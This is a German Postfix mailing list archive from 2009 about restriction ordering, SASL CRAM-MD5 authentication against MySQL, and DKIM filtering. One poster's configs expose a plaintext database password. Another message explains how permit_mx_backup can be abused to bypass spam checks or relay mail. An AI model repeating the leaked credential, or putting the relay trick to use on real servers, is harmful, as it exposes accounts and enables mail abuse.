hash:/etc/postfix/maps/helo_check, check_recipient_access hash:/etc/postfix/maps/empfaenger, reject_invalid_helo_hostname, reject_non_fqdn_helo_hostname, # reject_unknown_reverse_client_hostname, check_sender_mx_access cidr:/etc/postfix/maps/bogus_mx, check_sender_mx_access hash:/etc/postfix/maps/wildcard_mx, check_sender_access hash:/etc/postfix/maps/access, check_sender_ns_access hash:/etc/postfix/maps/bogus_dns, check_sender_access hash:/etc/postfix/checks/check_backscatterer, check_client_access pcre:/etc/postfix/maps/dialups.grey, check_recipient_access hash:/etc/postfix/roleaccount, ## policyd weight check_policy_service inet:127.0.0.1:12525, reject_rbl_client zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net und kein copy und paste das geht in die Hose. Alle Restriktionen kann du auf http://www.postfix.org/postconf.5.html nachlesen Die mit # gekennzeichneten sind nur im speziellen zu empfehlen. Hast du keine Probleme dann wirst du viele der checks nicht benötigen. Hast du ein spezielles Problem dann zeige das Problem anhand der logs es gibt fast für alles eine Lösung / Restriktionen. > Wie gerade beschrieben. Ja, derzeit kann ich diesen Servern vertrauen, > aber > auch in Zukunft? Ich kann meinen Server nicht rund um die Uhr > überwachen; > vielleicht bin ich ja auch nur etwas paranoid ;-) Ich werde also > sicherheitshalber den Relaycheck vor dem Whitelisting durchführen. *gg nichts währt ewig, lebenslänglich sind in der Regel auch nur 20 Jahre (von der Ehe mal abgesehen das kann wirklich eine lebenslange strafe sein*gg) Gibt es Probs musst du was ändern egal in welcher Richtung. Ist einer auf einer eingesetzten RBL drauf und du willst ihn dennoch haben dann Ausnahme, baut der scheiß dann reject. Aber was machst du dir Gedanken über das was irgendwann mal sein wird? Jetzt und Heute musst du eine Entscheidung so oder so vorzugehen treffen und ob das richtig war siehst du wenn das Licht angeht (oder so ähnlich war der Spruch) Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From driessen at fblan.de Mon Aug 10 18:26:23 2009 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 10 Aug 2009 18:26:23 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting undreject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: References: <20090810074807.GF27755@charite.de><3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de><20090810160258.GY27755@charite.de> Message-ID: <003001ca19d7$4d4d6020$0565a8c0@uwe> On Behalf Of Michael Grimm > > Moin, moin - > > On 10.08.2009, at 18:02, Ralf Hildebrandt wrote: > > * Michael Grimm : > > >>> zusammenfassen zu "reject_rbl_client zen.spamhaus.org" > >> > >> Ich wollte das pbl.spamhaus.org bewußt ausschließen; > > > > Das geht eleganter über die Returncodes. Welche false positives? > > Wie gesagt, mir ist diese Aussage im Zusammenhang einer länglichen > Usenet-Diskussion in Erinnerung und es ging um Mailserver mit > dynalias et al. Servernamen. Aber, ich kann mich auch irren. > > Hast Du einen Verweis auf ein Dokument, wo ich mich über diese > Returncodes (DNS nehm ich an) schlau machen könnte? www.spamhaus.org Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From trashcan at odo.in-berlin.de Mon Aug 10 18:48:20 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Mon, 10 Aug 2009 18:48:20 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelistingundreject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <002f01ca19d7$1cc0a250$0565a8c0@uwe> References: <007901ca1915$0cbcae20$0565a8c0@uwe> <002f01ca19d7$1cc0a250$0565a8c0@uwe> Message-ID: <9273DAE0-B508-498C-A8CF-449CD491B80E@odo.in-berlin.de> Moin, moin - On 10.08.2009, at 18:25, Uwe Driessen wrote: > On Behalf Of Michael Grimm >> Hmm. Aber kann man sich denn sicher sein, daß ein derart einmal als >> Goodguy identifizierter Absender nicht irgendwann einmal zum Badguy >> mutiert oder sein Server von Spammern übernommen wird? Ok, das war >> jetzt ein Worst-Case-Scenario. > > Wenn das passiert MUSST du was ändern! Ok. Ich werde mich wohl wirklich von dem Gedanken verabschieden müssen, jeder Eventualität qua Konfiguration im Keime zu ersticken. Wichtig ist für mich, daß bisher keiner sehr laut Sch$%&§ ob meiner Konfiguration ausstieß ;-) > Mal als Beispiel meine restriktionen mit dem Hinweis die passen > genau auf > meinem Server und mit großer Wahrscheinlichkeit auf keinem 2. Server. [smtpd_recipient_restrictions] > und kein copy und paste das geht in die Hose. Keine Bedenken! Ich habe ja schon meine angedachte main.cf gemailt, die sich im Wesentlichen nicht von Deiner unterscheidet. > Hast du ein spezielles Problem dann zeige das Problem anhand der logs > es gibt fast für alles eine Lösung / Restriktionen. Seufz. Einen Mailserver aufsetzen und warten ist verdammt kompliziert, für einen Einsteiger ;-) > Aber was machst du dir Gedanken über das was irgendwann mal sein wird? ;-) Nochmals besten Dank an alle, Michael From mailinglist at mbs-technet.com Mon Aug 10 18:45:38 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Mon, 10 Aug 2009 18:45:38 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" Message-ID: Hallo, ich habe einen Postfix aufgesetzt und konnte erfolgreiche Tests damit machen. Zum Authentifizieren habe ich das PLAIN LOGIN verfahren genutzt über den SASL Dienst. msgsrv01:~# cat /etc/postfix/sasl/smtpd.conf pwcheck_method: saslauthd mech_list: LOGIN CRAM-MD5 DIGEST-MD5 saslauthd_path: /var/spool/postfix/var/run/saslauthd/mux log_level: 3 allow_plaintext: true auxprop_plugin: sql sql_hostnames: 192.168.10.2 sql_user: email_admin sql_passwd: bhpYXcMCNAQJc1VLbtbJ sql_database: email_db1 sql_select: select password from users where email = '%u' Der SASL ist auf PAM eingestellt: MECHANISMS="pam" wodurch ich im /etc/pam.d/smtp einen verweis auf die MySQL gemacht habe: msgsrv01:~# cat /etc/pam.d/smtp auth required pam_mysql.so user=email_admin passwd=bhpYXcMCNAQJc1VLbtbJ host=192.168.10.2 db=email_db1 table=users usercolumn=email passwdcolumn=password crypt=1 account sufficient pam_mysql.so user=email_admin passwd=bhpYXcMCNAQJc1VLbtbJ host=192.168.10.2 db=email_db1 table=users usercolumn=email passwdcolumn=password crypt=1 Wenn mein Client nun versucht sich anzumelden dann bekommt er folgende Fehlermeldung: Aug 10 16:37:12 msgsrv01 postfix/smtpd[27891]: warning: SASL authentication failure: no secret in database Aug 10 16:37:12 msgsrv01 postfix/smtpd[27891]: warning: dslb-088-076-085-147.pools.arcor-ip.net[88.76.85.147]: SASL CRAM-MD5 authentication failed: authentication failure Wer kann mit sagen was ich falsch gemacht habe, bzw wie ich CRAM-MD5 mit MYSQL ans laufen kriege. Vielen Dank. Grüsse, Maik -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From werner at aloah-from-hell.de Mon Aug 10 19:00:03 2009 From: werner at aloah-from-hell.de (Werner Detter) Date: Mon, 10 Aug 2009 19:00:03 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: References: Message-ID: <4A805213.80902@aloah-from-hell.de> Hi, > msgsrv01:~# cat /etc/postfix/sasl/smtpd.conf > pwcheck_method: saslauthd > mech_list: LOGIN CRAM-MD5 DIGEST-MD5 > saslauthd_path: /var/spool/postfix/var/run/saslauthd/mux > log_level: 3 > allow_plaintext: true > auxprop_plugin: sql > sql_hostnames: 192.168.10.2 > sql_user: email_admin > sql_passwd: bhpYXcMCNAQJc1VLbtbJ > sql_database: email_db1 > sql_select: select password from users where email = '%u' Also entweder nutzt du das auxprop-plugin *oder* saslauth - beides macht keinen Sinn. Übrigens solltest du Passwörter nicht über öffentliche Mailinglisten publizieren :-) /etc/postfix/sasl/smtpd.conf mit auxprop-plugin: loglevel: 0 pwcheck_method: auxprop mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 auxprop-plugin: sql sql_engine: mysql sql_hostnames: localhost sql_database: mail sql_user: postfix sql_passwd: --- zensiert --- sql_select: SELECT password FROM mailbox WHERE username='%u' sql_usessl: no ODER so mit SASLAUTHD: /etc/postfix/sasl/smtpd.conf mit saslauthd: pwcheck_method: saslauthd loglevel: 0 mech_list: plain login /etc/pam.d/smtp auth required pam_mysql.so user=postfix passwd=----zensiert---- \ host=localhost \ db=mail \ table=mailbox \ usercolumn=username \ passwdcolumn=password \ crypt=1 account required pam_mysql.so user=postfix passwd=----zensiert----- \ host=localhost \ db=mail \ table=mailbox \ usercolumn=username \ passwdcolumn=password \ crypt=1 > Der SASL ist auf PAM eingestellt: > MECHANISMS="pam" Du hast verschlüsselte Passwörter in deiner Datenbank, damit funktioniert PLAIN/LOGIN aber kein CRAM-MD5. Sofern du "stärkere" Verfahren möchtest müssen die Passwörter im Klartext in der Datenbank zu finden sein. Ciao, Werner From mailinglist at mbs-technet.com Mon Aug 10 19:17:43 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Mon, 10 Aug 2009 19:17:43 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <4A805213.80902@aloah-from-hell.de> References: <4A805213.80902@aloah-from-hell.de> Message-ID: Hallo Werner, vielen Dank für den Tipp. Die Passwörter sind nur für Testzwecke. Es handelt sich noch um ein Testsystem und um kein Produktiv-System. Ich habe jetzt die einzelnen Konfigs angepasst. Jetzt kommuniziert der Postfix/sasl zumindest mit dem MySQL Server, was er vorher nicht getan hat. Aber es geht immer noch nicht. Im Log steht folgendes: Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: SASL authentication failure: no secret in database Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: xxxxxxxxxxxx: SASL CRAM-MD5 authentication failed: authentication failure Was kann ich noch überprüfen, bzw. was habe ich noch falschgemacht? Grüsse, Maik On Aug 10, 2009, at 7:00 PM, Werner Detter wrote: > Hi, > >> msgsrv01:~# cat /etc/postfix/sasl/smtpd.conf >> pwcheck_method: saslauthd >> mech_list: LOGIN CRAM-MD5 DIGEST-MD5 >> saslauthd_path: /var/spool/postfix/var/run/saslauthd/mux >> log_level: 3 >> allow_plaintext: true >> auxprop_plugin: sql >> sql_hostnames: 192.168.10.2 >> sql_user: email_admin >> sql_passwd: bhpYXcMCNAQJc1VLbtbJ >> sql_database: email_db1 >> sql_select: select password from users where email = '%u' > > Also entweder nutzt du das auxprop-plugin *oder* saslauth - beides > macht keinen Sinn. Übrigens solltest du Passwörter nicht über > öffentliche Mailinglisten publizieren :-) > > > /etc/postfix/sasl/smtpd.conf mit auxprop-plugin: > loglevel: 0 > pwcheck_method: auxprop > mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 > auxprop-plugin: sql > sql_engine: mysql > sql_hostnames: localhost > sql_database: mail > sql_user: postfix > sql_passwd: --- zensiert --- > sql_select: SELECT password FROM mailbox WHERE username='%u' > sql_usessl: no > > > ODER so mit SASLAUTHD: > > /etc/postfix/sasl/smtpd.conf mit saslauthd: > pwcheck_method: saslauthd > loglevel: 0 > mech_list: plain login > > /etc/pam.d/smtp > auth required pam_mysql.so user=postfix passwd=---- > zensiert---- \ > host=localhost \ > db=mail \ > table=mailbox \ > usercolumn=username \ > passwdcolumn=password \ > crypt=1 > > > account required pam_mysql.so user=postfix passwd=---- > zensiert----- \ > host=localhost \ > db=mail \ > table=mailbox \ > usercolumn=username \ > passwdcolumn=password \ > crypt=1 > > > >> Der SASL ist auf PAM eingestellt: >> MECHANISMS="pam" > > Du hast verschlüsselte Passwörter in deiner Datenbank, damit > funktioniert > PLAIN/LOGIN aber kein CRAM-MD5. Sofern du "stärkere" Verfahren > möchtest > müssen die Passwörter im Klartext in der Datenbank zu finden sein. > > Ciao, > Werner > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From werner at aloah-from-hell.de Mon Aug 10 19:21:52 2009 From: werner at aloah-from-hell.de (Werner Detter) Date: Mon, 10 Aug 2009 19:21:52 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: References: <4A805213.80902@aloah-from-hell.de> Message-ID: <4A805730.5040404@aloah-from-hell.de> Hi, > vielen Dank für den Tipp. Die Passwörter sind nur für Testzwecke. Es > handelt sich noch um ein Testsystem und um > kein Produktiv-System. Ich habe jetzt die einzelnen Konfigs angepasst. > Jetzt kommuniziert der Postfix/sasl zumindest mit dem MySQL Server, was > er vorher nicht getan hat. > Aber es geht immer noch nicht. Im Log steht folgendes: > Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: SASL > authentication failure: no secret in database > Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: xxxxxxxxxxxx: > SASL CRAM-MD5 authentication failed: authentication failure Hast du jetzt auxprop oder SASLAUTHD verwendet? Lass das mal nochmal sehen ... MySQL-Logging aktivieren und schaun *was* für eine Query ankommt, was die Datenbank zurück gibt. Ciao, Werner From mailinglist at mbs-technet.com Mon Aug 10 19:31:53 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Mon, 10 Aug 2009 19:31:53 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <4A805730.5040404@aloah-from-hell.de> References: <4A805213.80902@aloah-from-hell.de> <4A805730.5040404@aloah-from-hell.de> Message-ID: <761318CF-116B-498E-AE74-83DF01408626@mbs-technet.com> Hi Werner, hier meine config: loglevel: 3 pwcheck_method: auxprop mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 auxprop-plugin: sql sql_engine: mysql sql_hostnames: 192.168.10.2 sql_database: email_db1 sql_user: email_admin sql_passwd: ---password--- sql_select: SELECT password FROM mailbox WHERE username='%u' sql_usessl: no Das MySQL logging muss ich noch aktivieren. Sende den Query nach. Guck aber schonmal drüber. Grüsse, Maik On Aug 10, 2009, at 7:21 PM, Werner Detter wrote: > Hi, > > >> vielen Dank für den Tipp. Die Passwörter sind nur für Testzwecke. Es >> handelt sich noch um ein Testsystem und um >> kein Produktiv-System. Ich habe jetzt die einzelnen Konfigs >> angepasst. >> Jetzt kommuniziert der Postfix/sasl zumindest mit dem MySQL Server, >> was >> er vorher nicht getan hat. > >> Aber es geht immer noch nicht. Im Log steht folgendes: >> Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: SASL >> authentication failure: no secret in database >> Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: xxxxxxxxxxxx: >> SASL CRAM-MD5 authentication failed: authentication failure > > Hast du jetzt auxprop oder SASLAUTHD verwendet? Lass das mal nochmal > sehen ... > > MySQL-Logging aktivieren und schaun *was* für eine Query ankommt, was > die Datenbank zurück gibt. > > Ciao, > Werner > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From mailinglist at mbs-technet.com Mon Aug 10 19:40:12 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Mon, 10 Aug 2009 19:40:12 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <761318CF-116B-498E-AE74-83DF01408626@mbs-technet.com> References: <4A805213.80902@aloah-from-hell.de> <4A805730.5040404@aloah-from-hell.de> <761318CF-116B-498E-AE74-83DF01408626@mbs-technet.com> Message-ID: Hi Werner, ich habs ;-) War ein Schreibfehler in dem SQL Query. Vielen Dank nochmal mit dem Wink in die richtige Richtung. Sollte nochmal was sein melde ich mich wieder. Viele Grüsse, Maik On Aug 10, 2009, at 7:31 PM, Maik Brauer wrote: > Hi Werner, > > hier meine config: > > loglevel: 3 > pwcheck_method: auxprop > mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 > auxprop-plugin: sql > sql_engine: mysql > sql_hostnames: 192.168.10.2 > sql_database: email_db1 > sql_user: email_admin > sql_passwd: ---password--- > sql_select: SELECT password FROM mailbox WHERE username='%u' > sql_usessl: no > > > Das MySQL logging muss ich noch aktivieren. > Sende den Query nach. Guck aber schonmal drüber. > > > Grüsse, > Maik > > > On Aug 10, 2009, at 7:21 PM, Werner Detter wrote: > >> Hi, >> >> >>> vielen Dank für den Tipp. Die Passwörter sind nur für Testzwecke. Es >>> handelt sich noch um ein Testsystem und um >>> kein Produktiv-System. Ich habe jetzt die einzelnen Konfigs >>> angepasst. >>> Jetzt kommuniziert der Postfix/sasl zumindest mit dem MySQL >>> Server, was >>> er vorher nicht getan hat. >> >>> Aber es geht immer noch nicht. Im Log steht folgendes: >>> Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: SASL >>> authentication failure: no secret in database >>> Aug 10 17:13:35 msgsrv01 postfix/smtpd[28316]: warning: >>> xxxxxxxxxxxx: >>> SASL CRAM-MD5 authentication failed: authentication failure >> >> Hast du jetzt auxprop oder SASLAUTHD verwendet? Lass das mal nochmal >> sehen ... >> >> MySQL-Logging aktivieren und schaun *was* für eine Query ankommt, was >> die Datenbank zurück gibt. >> >> Ciao, >> Werner >> >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listen.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From werner at aloah-from-hell.de Mon Aug 10 19:44:11 2009 From: werner at aloah-from-hell.de (Werner Detter) Date: Mon, 10 Aug 2009 19:44:11 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <761318CF-116B-498E-AE74-83DF01408626@mbs-technet.com> References: <4A805213.80902@aloah-from-hell.de> <4A805730.5040404@aloah-from-hell.de> <761318CF-116B-498E-AE74-83DF01408626@mbs-technet.com> Message-ID: <4A805C6B.8080102@aloah-from-hell.de> Hi Maik, > sql_select: SELECT password FROM mailbox WHERE username='%u' Das kann ja schon mal gar nicht funktionieren, wenn deine Tabelle nicht "mailbox" heisst - und das tut sie nicht. Im ersten Post hattest du folgendes Query: sql_select: select password from users where email = '%u' Das solltest du hier auch wieder setzen sofern deine Tabelle "users" heisst, dein (klartext)Passwortfeld "password", etc. Ciao, Werner From postfixbuch-users at drobic.de Mon Aug 10 20:02:11 2009 From: postfixbuch-users at drobic.de (Sandy Drobic) Date: Mon, 10 Aug 2009 20:02:11 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> References: <20090810074807.GF27755@charite.de> <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> Message-ID: <4A8060A3.2080108@drobic.de> Michael Grimm wrote: > Hallo - > > Ralf Hildebrandt schrieb: >> * Michael Grimm : >>> permit_mx_backup, >> >> Wer braucht denn sowas? > > Nun, das fand ich in Kapitel 8.8 ;-) Habe es jetzt noch einmal > nachgelesen, und > es scheint für mich nur dann von Relevanz zu sein, wenn mein Server als > Backup > für einen anderen diente. Habe ich wohl mit meinem Scenario (habe selbst MX > Backups im DNS) verwechselt. Gegenfrage: Schadet der Eintrag? Potentielle > Schwachstelle? Der Check gilt als "deprecated", da er sich in der Tat ausnutzen lässt. Wenn ich in meiner Domain deinen Server als zweiten MX eintrage, sagt permit_mx_backup "OK" an der Stelle, wo du permit_mx_backup einträgst. Im besten Fall kann ich dann die Spam-Checks umgehen, im schlimmsten Fall kann ich deinen Server als Relay verwenden. Je nachdem, an welcher Stelle du permit_mx_backup einträgst. Generell wird es nicht ermutigt, da du damit eine Einstellung überprüfst, die eventuell von einem nicht vertrauenswürdigen Dritten vorgenommen werden kann. permit_mx_backup_networks erlaubt es dir, die IPs einzuschränken, für die permit_mx_backup geprüft wird. Der Default ist jedoch leer. > # ------------------------------------------------------------------------- > # white- and blacklisting > # ------------------------------------------------------------------------- > # check_client_access pcre:/usr/local/etc/postfix/access_client, > # check_helo_access pcre:/usr/local/etc/postfix/access_helo, > check_sender_access pcre:/usr/local/etc/postfix/access_sender, > check_recipient_access > pcre:/usr/local/etc/postfix/access_recipient, > # ------------------------------------------------------------------------- Ich würde diese Checks noch aufteilen auf die Rollen (Black- und Whitelists). Zuerst die Whitelists und danach dann die Blacklists. Der richtige Ort ist nach: ... reject_unauth_destination reject_unlisted_recipient reject_unverified_recipient # hier die Whitelists Damit wird nicht für ungültige Empfänger angenommen, aber die Whitelist nicht durch einen anderen Eintrag ausgehebelt. Ein weiterer Vorteil ist die Transparenz. Einem "access_sender" siehst du nicht an, welche Einträge drinstehen. Einem "sender_blacklist" aber sofort. Wenn die Konfig komplizierter wird, bist du für jedes bischen Transparenz dankbar. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@)drobic (.) de From gerald at holl.co.at Mon Aug 10 20:58:35 2009 From: gerald at holl.co.at (Gerald Holl) Date: Mon, 10 Aug 2009 20:58:35 +0200 Subject: [Postfixbuch-users] Reihenfolge der Restrictions bei DKIM Message-ID: <4A806DDB.3080904@holl.co.at> Liebe Postfixer, Mich beschäftigen ein paar Fragen, obwohl die config schon seit langem funktioniert. Nachfolgend die relevanten Fragmente der config: smtpd_client_restrictions = reject_unauth_pipelining smtpd_helo_restrictions = reject_invalid_helo_hostname smtpd_recipient_restrictions = check_sender_access regexp:/etc/postfix/filter_originating, permit_mynetworks, reject_non_fqdn_recipient, reject_unknown_recipient_domain, permit_sasl_authenticated, check_sender_access regexp:/etc/postfix/filter_foreign, reject_unauth_destination, check_policy_service inet:127.0.0.1:12525, check_policy_service inet:127.0.0.1:60000 smtpd_sender_restrictions = reject_non_fqdn_sender, reject_unknown_sender_domain Ich verwende Postfix mit amavisd-new für DKIM Signierung und Verifikation, darüber hinaus policyd-weight und postgrey. In der Doku zu amavis habe ich heute zufällig entdeckt, dass man die beiden check_sender_access Anweisungen keinesfalls in smtpd_recipient_restrictions reingeben soll, sondern nur in smtpd_sender_restrictions, weil bei mehreren Empfängern ein 'surprising (and incorrect) result' auftreten kann. Heißt das nun, ich soll die beiden Anweisungen zu den sender restrictions geben? Warum? Warum muss die check_sender_access regexp:/etc/postfix/filter_originating Anweisung ganz am Beginn stehen? Und gehe ich richtig in der Annahme, wenn die check_policy_service Anweisung (insbes. die policyd-weight) ganz am Beginn stehen würde, meine Clients keine Mails mehr versenden können (Spamhaus PBL), die haben ja eine dyn. IP und darum permit_sasl_authenticated vor den check_policy Anweisungen stehen muss? Vielen Dank für Eure Hilfe, Gerald -- Don't use kearney at kearney.holl.co.at, use the given from address only From trashcan at odo.in-berlin.de Mon Aug 10 21:29:37 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Mon, 10 Aug 2009 21:29:37 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <4A8060A3.2080108@drobic.de> References: <20090810074807.GF27755@charite.de> <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> <4A8060A3.2080108@drobic.de> Message-ID: Moin, moin -- On 10.08.2009, at 20:02, Sandy Drobic wrote: > Michael Grimm [permit_mx_backup] >> Schadet der Eintrag? Potentielle Schwachstelle? > > Der Check gilt als "deprecated", da er sich in der Tat ausnutzen > lässt. Wenn > ich in meiner Domain deinen Server als zweiten MX eintrage, sagt > permit_mx_backup "OK" an der Stelle, wo du permit_mx_backup > einträgst. Im > besten Fall kann ich dann die Spam-Checks umgehen, im schlimmsten > Fall kann > ich deinen Server als Relay verwenden. Je nachdem, an welcher Stelle > du > permit_mx_backup einträgst. > > Generell wird es nicht ermutigt, da du damit eine Einstellung > überprüfst, die > eventuell von einem nicht vertrauenswürdigen Dritten vorgenommen > werden kann. > > permit_mx_backup_networks erlaubt es dir, die IPs einzuschränken, > für die > permit_mx_backup geprüft wird. Der Default ist jedoch leer. Danke für die Erläuterungen, das mit den permit_mx_backup_networks war mir entgangen. >> # >> ------------------------------------------------------------------------- >> # white- and blacklisting >> # >> ------------------------------------------------------------------------- >> # check_client_access pcre:/usr/local/etc/postfix/ >> access_client, >> # check_helo_access pcre:/usr/local/etc/postfix/access_helo, >> check_sender_access pcre:/usr/local/etc/postfix/access_sender, >> check_recipient_access pcre:/usr/local/etc/postfix/ >> access_recipient, >> # >> ------------------------------------------------------------------------- > > Ich würde diese Checks noch aufteilen auf die Rollen (Black- und > Whitelists). > Zuerst die Whitelists und danach dann die Blacklists. Der richtige > Ort ist nach: > > ... > reject_unauth_destination > reject_unlisted_recipient > reject_unverified_recipient > # hier die Whitelists Yep. Hier stehen sie mittlerweile auch, und die Empfehlung mit ... > Ein weiterer Vorteil ist die Transparenz. Einem "access_sender" > siehst du > nicht an, welche Einträge drinstehen. Einem "sender_blacklist" aber > sofort. > Wenn die Konfig komplizierter wird, bist du für jedes bischen > Transparenz dankbar. ... nehme ich dankbar an. Überzeugt mich. Besten Dank, Michael From driessen at fblan.de Tue Aug 11 08:58:43 2009 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 11 Aug 2009 08:58:43 +0200 Subject: [Postfixbuch-users] Reihenfolge der Restrictions bei DKIM In-Reply-To: <4A806DDB.3080904@holl.co.at> References: <4A806DDB.3080904@holl.co.at> Message-ID: <002601ca1a51$2a66be10$0565a8c0@uwe> On Behalf Of Gerald Holl > > Liebe Postfixer, > > Mich beschäftigen ein paar Fragen, obwohl die config schon seit langem > funktioniert. > Nachfolgend die relevanten Fragmente der config: > smtpd_client_restrictions = reject_unauth_pipelining > smtpd_helo_restrictions = reject_invalid_helo_hostname > smtpd_recipient_restrictions = check_sender_access > regexp:/etc/postfix/filter_originating, permit_mynetworks, > reject_non_fqdn_recipient, reject_unknown_recipient_domain, > permit_sasl_authenticated, check_sender_access > regexp:/etc/postfix/filter_foreign, reject_unauth_destination, > check_policy_service inet:127.0.0.1:12525, check_policy_service > inet:127.0.0.1:60000 > smtpd_sender_restrictions = reject_non_fqdn_sender, > reject_unknown_sender_domain Besser ist immer postconf -n Alle restriktionen einmal in smtpd_recipient_restrictions eintragen und ausführen Empfehlung in den Postfixbüchern und ich schätze mal die meisten Server dieser Liste laufen so. > > > Ich verwende Postfix mit amavisd-new für DKIM Signierung und > Verifikation, darüber hinaus policyd-weight und postgrey. > > In der Doku zu amavis habe ich heute zufällig entdeckt, dass man die > beiden check_sender_access Anweisungen keinesfalls in > smtpd_recipient_restrictions reingeben soll, sondern nur in > smtpd_sender_restrictions, weil bei mehreren Empfängern ein 'surprising > (and incorrect) result' auftreten kann. Heißt das nun, ich soll die > beiden Anweisungen zu den sender restrictions geben? Warum? Mehrere Empfänger von dir aus gesehen also abgehende Mails werden tangiert solange der User über permit sasl, mynetwork schon vorher den Test verlassen hat. Reinkommend ist es eigentlich auch kein Problem denn den Absender willst du (dunno, Verzeigung in weiter checks oder gar ok(nicht zu empfehlen)) oder du willst ihn nicht transportieren dann bekommt er ein reject. Probleme können lediglich auftauchen wenn du das Ganze User bezogen machst und der eine will den Absender und der andere nicht. Dann kann es vorkommen, bei einer Mail von diesem Absender an mehrere Empfänger auf deinem Server, das die Mail komplett abgewiesen wird. > > Warum muss die check_sender_access > regexp:/etc/postfix/filter_originating Anweisung ganz am Beginn stehen? Nö die muß genau da stehen wo du die brauchst. Soll die auch für die eigenen User gelten dann vor den permit sasl und network, nur für fremde nach dem permit sasl > > Und gehe ich richtig in der Annahme, wenn die check_policy_service > Anweisung (insbes. die policyd-weight) ganz am Beginn stehen würde, > meine Clients keine Mails mehr versenden können (Spamhaus PBL), die > haben ja eine dyn. IP und darum permit_sasl_authenticated vor den > check_policy Anweisungen stehen muss? > Das willst du ja nicht vor permit sasl haben. Wen willst du damit prüfen? Die Antwort auf die Frage beantwortet dir wo der check eingefügt wird. In der Regel wird man versuchen "interne" checks vor den "externen" checks durchzuführen. Geht aber auch nicht immer. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From lists at carsten-brandt.eu Tue Aug 11 12:32:46 2009 From: lists at carsten-brandt.eu (Carsten Brandt) Date: Tue, 11 Aug 2009 12:32:46 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: <20090810152656.x7ro5acjoksksco8@buero.tachtler.net> References: <20090810125159.GB29820@mail.incertum.net> <20090810152656.x7ro5acjoksksco8@buero.tachtler.net> Message-ID: <4A8148CE.6090508@carsten-brandt.eu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Klaus Tachtler schrieb: > > Hallo Zusammen, > >>>> Out: 451 4.3.0 Error: queue file write error > > diese Fehlermeldung taucht z.B. auch auf, wenn der AMaViS auf z.B. Port > 10024 oder den Port auf den er bei Dir horcht nicht erreichbar ist. Das passiert auch z.B. bei 